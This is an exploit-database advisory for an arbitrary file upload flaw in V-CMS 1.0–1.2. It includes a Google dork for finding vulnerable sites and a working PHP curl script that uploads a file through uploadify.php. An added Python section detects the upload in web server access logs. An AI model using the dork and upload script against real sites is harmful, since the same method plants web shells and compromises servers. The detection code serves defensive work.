##################################################
# Description : V-CMS A Open Source (GNU) CushyCMS / SurrealCMS Clone Arbitrary File Upload Vulnerability
# Version : 1.0 - 1.2
# Google Dork : "Powered by: V-CMS v1.0" or "Powered by: V-CMS v1.2"
# Files : https://sourceforge.net/projects/v-cms/files/latest/download?source=files
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit Code :

PostShell.php :

<?php
$uploadfile="phpinfo.php";
$ch = curl_init("http://exemple.com/includes/js/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$uploadfile",
          'folder'=>'/theme/default/js/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Url : http://exemple.com/includes/js/uploadify/phpinfo.php

phpinfo.php :

<?php
phpinfo();
?>
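For defenders, the two requests in the advisory (a POST to uploadify.php, then a GET for a PHP file in an uploadify directory) leave a recognisable trace in web server access logs. The following is an added example, not part of the original advisory or of V-CMS: it assumes Combined Log Format, and the log lines, the function name and the list of shipped PHP files are constructed for illustration.

```python
import re

# Combined Log Format: ip - - [time] "METHOD target HTTP/x" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

UPLOAD_ENDPOINT = "/includes/js/uploadify/uploadify.php"  # path from the advisory
# Assumption: the only PHP file the package ships in an uploadify directory.
SHIPPED_PHP = {"uploadify.php"}


def find_uploadify_abuse(lines):
    """Return (kind, ip, time, path, status) tuples for requests worth reviewing."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line in the expected format
        ip, when, method, target, status = m.groups()
        path = target.split("?", 1)[0].lower()  # drop the query string
        directory, _, name = path.rpartition("/")
        if method == "POST" and path == UPLOAD_ENDPOINT:
            # The advisory's upload goes through this script: review every POST to it.
            hits.append(("upload-post", ip, when, path, int(status)))
        elif (directory.endswith("/uploadify") and name.endswith(".php")
              and name not in SHIPPED_PHP and status.startswith("2")):
            # A PHP file that is not part of the package was served from an
            # uploadify directory (covers /theme/default/js/uploadify/ as well).
            hits.append(("served-unknown-php", ip, when, path, int(status)))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Mar/2013:10:01:02 +0000] "POST /includes/js/uploadify/uploadify.php HTTP/1.1" 200 1 "-" "-"',
    '198.51.100.7 - - [12/Mar/2013:10:01:05 +0000] "GET /includes/js/uploadify/phpinfo.php HTTP/1.1" 200 60211 "-" "-"',
    '203.0.113.9 - - [12/Mar/2013:10:02:00 +0000] "GET /includes/js/uploadify/uploadify.css HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2013:10:02:01 +0000] "GET /includes/js/uploadify/missing.php HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Mar/2013:10:02:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_uploadify_abuse(SAMPLE_LOG):
        print(*hit, sep="  ")
```

A "served-unknown-php" hit with a 2xx status means a PHP file outside the package was served from the upload directory, so the host should be checked for dropped files, not just the logs.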